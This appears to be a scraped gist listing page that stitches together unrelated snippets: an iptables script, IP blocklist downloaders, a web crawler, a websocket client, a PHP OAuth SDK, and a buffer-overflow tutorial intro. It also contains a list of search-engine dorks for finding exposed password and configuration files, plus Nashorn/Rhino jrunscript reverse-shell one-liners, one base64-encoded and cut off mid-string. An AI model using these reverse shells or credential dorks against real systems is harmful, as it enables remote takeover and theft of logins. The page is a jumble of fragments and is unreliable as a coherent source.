This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Modify this file accordingly for your specific requirement. | |
# http://www.thegeekstuff.com | |
# 1. Delete all existing rules | |
iptables -F | |
# 2. Set default chain policies | |
iptables -P INPUT DROP | |
iptables -P FORWARD DROP | |
iptables -P OUTPUT DROP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env sh | |
# Download lists, unpack and filter, write to stdout | |
curl -s https://www.iblocklist.com/lists.php \ | |
| sed -n "s/.*value='\(http:.*=bt_.*\)'.*/\1/p" \ | |
| xargs wget -O - \ | |
| gunzip \ | |
| egrep -v '^#' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//PhantomJS http://phantomjs.org/ based web crawler Anton Ivanov anton.al.ivanov@gmail.com 2012 | |
//UPDATE: This gist has been made into a Node.js module and now can be installed with "npm install js-crawler" | |
//the Node.js version does not use Phantom.JS, but the API available to the client is similar to the present gist | |
(function(host) { | |
function Crawler() { | |
this.visitedURLs = {}; | |
}; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <websocketpp/config/asio_no_tls_client.hpp> | |
#include <websocketpp/client.hpp> | |
#include <iostream> | |
typedef websocketpp::client<websocketpp::config::asio_client> client; | |
using websocketpp::lib::placeholders::_1; | |
using websocketpp::lib::placeholders::_2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* PHP SDK | |
* @version 2.0.0 | |
* @author connect@qq.com | |
* @copyright © 2013, Tencent Corporation. All rights reserved. | |
* @modify_author daoiqi | |
* @modify_date 20140416 | |
*/ | |
class QQ_Oauth{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
admin account info" filetype:log | |
!Host=*.* intext:enc_UserPassword=* ext:pcf | |
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
"AutoCreate=TRUE password=*" | |
"http://*:*@www” domainname | |
"index of/" "ws_ftp.ini" "parent directory" | |
"liveice configuration file" ext:cfg -site:sourceforge.net | |
"parent directory" +proftpdpasswd | |
Duclassified" -site:duware.com "DUware All Rights reserved" | |
duclassmate" -site:duware.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# This script runs every other night at 04:56 CET on a webserver I maintain | |
# Results are always at: https://jult.net/block.txt ( or https://jult.net/block.txt.gz ) | |
# And much smaller, stripped of BS; https://jult.net/bloc.txt | |
# For use in Tixati IP filter: https://jult.net/bloc.txt.gz !!! | |
# And finally a txt file with just the bold IP-ranges: https://jult.net/bl.txt (or https://jult.net/bl.txt.gz ) | |
# Download open block-lists, unpack, filter: | |
curl -s https://www.iblocklist.com/lists.php | grep -A 2 Bluetack | xargs wget -qO - --limit-rate=500k | gunzip -f | egrep -v '^#' > /tmp/xbp |
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
OlderNewer